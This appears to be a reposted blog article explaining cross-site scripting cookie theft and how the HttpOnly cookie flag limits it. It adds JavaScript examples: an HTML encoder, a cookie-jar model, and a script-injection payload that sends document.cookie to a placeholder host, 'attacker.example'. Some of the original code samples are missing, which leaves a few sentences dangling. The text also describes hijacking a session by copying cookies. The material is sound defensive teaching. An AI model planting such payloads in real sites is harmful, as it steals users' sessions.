Protecting Your Cookies: HttpOnly
Most of the time when you accept input from the user, the very first thing you do is pass it through an HTML encoder before writing it back into a page. So tricksy things like:
are automagically converted into their harmless encoded equivalents:
It all starts with this bit of script added to a user’s profile page.
That’s right — whoever loads this script-injected user profile page has just unwittingly transmitted their browser cookies to an evil remote server!
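As an added illustration (not the original post's code, whose own samples are not reproduced on this page), here is an HTML encoder of the kind the text describes, beside the sort of cookie-stealing script the text describes, and a profile-page renderer with and without the encoder in front of the user-controlled text. The collector host `attacker.example`, the function names and the sample bio and cookie string are all constructed for the example:

```javascript
// Added example, not the original post's code. The collector host, the
// profile renderer and the sample values are constructed for illustration.

// Encode the five characters that let text break out of an HTML text node
// or attribute value. Everything else passes through unchanged.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

function htmlEncode(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// What an injected script typically does: read document.cookie and ship it
// to a server the attacker controls, here via an image request so nothing
// visible happens in the victim's browser. "attacker.example" is a placeholder.
const COLLECTOR = 'https://attacker.example/collect';
const STOLEN_COOKIE_PAYLOAD =
  '<script>new Image().src="' + COLLECTOR +
  '?c="+encodeURIComponent(document.cookie)</script>';

// The URL that payload would request inside a victim's browser, given the
// string document.cookie returns there.
function beaconUrl(documentCookie) {
  return COLLECTOR + '?c=' + encodeURIComponent(documentCookie);
}

// A profile page that writes the user's bio straight into the HTML: the
// payload becomes live markup and runs for every visitor.
function renderProfileUnsafe(bio) {
  return '<div class="bio">' + bio + '</div>';
}

// The same page with the encoder in front of the user-controlled text: the
// payload is displayed as text and never parsed as a <script> element.
function renderProfileSafe(bio) {
  return '<div class="bio">' + htmlEncode(bio) + '</div>';
}

// Constructed cookie string, shaped like the one a logged-in user would have.
const SAMPLE_COOKIE = 'ASP.NET_SessionId=ig2fac55; user=t=bfabf0b1c1133a822';

console.log('unsafe:', renderProfileUnsafe(STOLEN_COOKIE_PAYLOAD));
console.log('safe:  ', renderProfileSafe(STOLEN_COOKIE_PAYLOAD));
console.log('beacon:', beaconUrl(SAMPLE_COOKIE));
```

The encoder neutralizes the straightforward `<script>` case; the post's point is that once an encoder is bypassed, whatever script lands in the page can read `document.cookie` unless the browser refuses, which is what HttpOnly arranges.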
As we’ve already established, once someone has your browser cookies for a given website, they essentially have the keys to the kingdom for your identity there. If you don’t believe me, get the Add N Edit cookies extension for Firefox and try it yourself. Log into a website, copy the essential cookie values, then paste them into another browser running on another computer. That’s all it takes. It’s quite an eye opener.
When you tag a cookie with the HttpOnly flag, it tells the browser that this particular cookie should only be sent back to the server in HTTP requests. Any attempt to access the cookie from client script, such as reading document.cookie, is refused. Of course, this presumes you have:
- A modern web browser
- A browser that actually implements HttpOnly correctly
The good news is that most modern browsers do support the HttpOnly flag: Opera 9.5, Internet Explorer 7, and Firefox 3. I’m not sure if the latest versions of Safari do or not. It’s sort of ironic that the HttpOnly flag was pioneered by Microsoft in hoary old Internet Explorer 6 SP1, a browser which isn’t exactly known for its iron-clad security record.
Regardless, HttpOnly cookies are a great idea, and properly implemented, make huge classes of common XSS attacks much harder to pull off. Here’s what a cookie looks like with the HttpOnly flag set:
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Set-Cookie: ASP.NET_SessionId=ig2fac55; path=/; HttpOnly
Set-Cookie: user=t=bfabf0b1c1133a822; path=/; HttpOnly
Date: Tue, 26 Aug 2008 10:51:08 GMT
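To make concrete what the flag changes, here is an added example (not from the original post) modelling how a browser that implements HttpOnly treats the cookies in the response above. The two `Set-Cookie` lines are the ones shown in the post; the third cookie (`theme=dark`, without the flag), the jar structure and the function names are constructed for the illustration:

```javascript
// Added example, not from the original post: a minimal model of a browser
// cookie jar that honours HttpOnly. The first two Set-Cookie lines are the
// post's; the "theme" cookie and all function names are constructed.

const RESPONSE_HEADERS = [
  'Content-Type: text/html; charset=utf-8',
  'Set-Cookie: ASP.NET_SessionId=ig2fac55; path=/; HttpOnly',
  'Set-Cookie: user=t=bfabf0b1c1133a822; path=/; HttpOnly',
  'Set-Cookie: theme=dark; path=/',          // constructed: no HttpOnly flag
  'Date: Tue, 26 Aug 2008 10:51:08 GMT',
];

// Parse one Set-Cookie header. The first "=" separates name from value, so a
// value that itself contains "=" (as user=t=... does) survives intact.
// Attribute names are matched case-insensitively, as browsers do.
function parseSetCookie(line) {
  const body = line.replace(/^Set-Cookie:\s*/i, '');
  const [pair, ...attrs] = body.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const cookie = { name: pair.slice(0, eq), value: pair.slice(eq + 1), path: '/', httpOnly: false };
  for (const attr of attrs) {
    const [key, val] = attr.split('=');
    switch (key.toLowerCase()) {
      case 'httponly': cookie.httpOnly = true; break;
      case 'path': cookie.path = val || '/'; break;
      default: break; // Domain, Expires, Secure etc. are not needed for this model
    }
  }
  return cookie;
}

// Store every Set-Cookie header from a response in a jar (name -> cookie map).
function storeCookies(headers, jar = new Map()) {
  for (const line of headers) {
    if (/^Set-Cookie:/i.test(line)) {
      const c = parseSetCookie(line);
      jar.set(c.name, c);
    }
  }
  return jar;
}

// What script sees when it reads document.cookie: HttpOnly cookies are omitted.
function documentCookie(jar) {
  return [...jar.values()]
    .filter((c) => !c.httpOnly)
    .map((c) => `${c.name}=${c.value}`)
    .join('; ');
}

// What the browser puts in the Cookie request header: every cookie, HttpOnly
// or not, because the flag only hides the cookie from script, not from the server.
function requestCookieHeader(jar) {
  return [...jar.values()].map((c) => `${c.name}=${c.value}`).join('; ');
}

// The IE7 behaviour the post describes for XMLHttpRequest.getAllResponseHeaders():
// Set-Cookie lines carrying HttpOnly are stripped before script can read them.
function scriptVisibleResponseHeaders(headers) {
  return headers.filter((line) => !(/^Set-Cookie:/i.test(line) && parseSetCookie(line).httpOnly));
}

const jar = storeCookies(RESPONSE_HEADERS);
console.log('document.cookie       ->', JSON.stringify(documentCookie(jar)));
console.log('Cookie request header ->', requestCookieHeader(jar));
console.log('getAllResponseHeaders ->', scriptVisibleResponseHeaders(RESPONSE_HEADERS));
```

Run under Node, the injected-script view (`document.cookie`) yields only `theme=dark`, while the request the browser sends to the server still carries the session and user cookies. That is the whole mechanism: the server never notices the flag, and script never sees the cookie.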
This isn’t exactly news; Scott Hanselman wrote about HttpOnly a while ago. I’m not sure he understood the implications, as he was quick to dismiss it as “slowing down the average script kiddie for 15 seconds”. In his defense, this was way back in 2005. A dark, primitive time. Almost pre-YouTube.
HttpOnly cookies can in fact be remarkably effective. Here’s what we know:
- HttpOnly restricts all access to document.cookie in IE7, Firefox 3, and Opera 9.5 (unsure about Safari)
- HttpOnly removes cookie information from the response headers returned by getAllResponseHeaders() in IE7. It should do the same thing in Firefox, but it doesn’t, because there’s a bug.
- XMLHttpRequest objects may only be submitted to the domain they originated from (the same-origin policy), so there is no cross-domain posting of the cookies.
Even with those caveats, I believe HttpOnly cookies are a huge security win. If I — er, I mean, if my friend — had implemented HttpOnly cookies, it would have totally protected his users from the above exploit!
HttpOnly cookies don’t make you immune from XSS cookie theft, but they raise the bar considerably. Keep in mind what the flag does not do, either: an injected script still runs inside the victim’s session and can make requests to the site as that user; HttpOnly only keeps the cookie value itself from being read and carried off. It’s practically free, a “set it and forget it” setting that’s bound to become increasingly secure over time as more browsers follow the example of IE7 and implement client-side HttpOnly cookie security correctly. If you develop web applications, or you know anyone who develops web applications, make sure they know about HttpOnly cookies.
article taken from: http://blog.codinghorror.com/protecting-your-cookies-httponly/